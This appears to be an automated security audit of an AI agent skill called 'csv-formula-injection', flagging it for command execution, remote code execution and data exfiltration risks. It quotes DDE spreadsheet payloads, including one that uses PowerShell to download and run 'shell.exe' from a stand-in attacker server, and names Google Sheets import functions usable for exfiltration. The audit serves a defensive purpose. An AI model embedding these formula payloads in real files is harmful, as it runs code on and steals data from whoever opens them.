csv-formula-injection

Warn

Audited by Gen Agent Trust Hub on Apr 9, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides numerous examples of Dynamic Data Exchange (DDE) payloads designed to execute arbitrary local commands when a CSV is opened in spreadsheet software. Evidence includes payloads such as '=cmd|' /C calc'!A0' and variations using different trigger characters like '@' and '+'.
  • [REMOTE_CODE_EXECUTION]: The documentation includes explicit patterns for remote code execution by chaining spreadsheet formulas with system shells. A specific example provided is '=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0', which fetches and executes a remote executable.
  • [DATA_EXFILTRATION]: The skill documents the use of Google Sheets specific functions (IMPORTXML, IMPORTHTML, IMPORTFEED, IMPORTDATA) to make outbound network requests. These functions can be used to exfiltrate data from a spreadsheet or probe internal network resources via the spreadsheet application's infrastructure.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Apr 9, 2026, 04:28 AM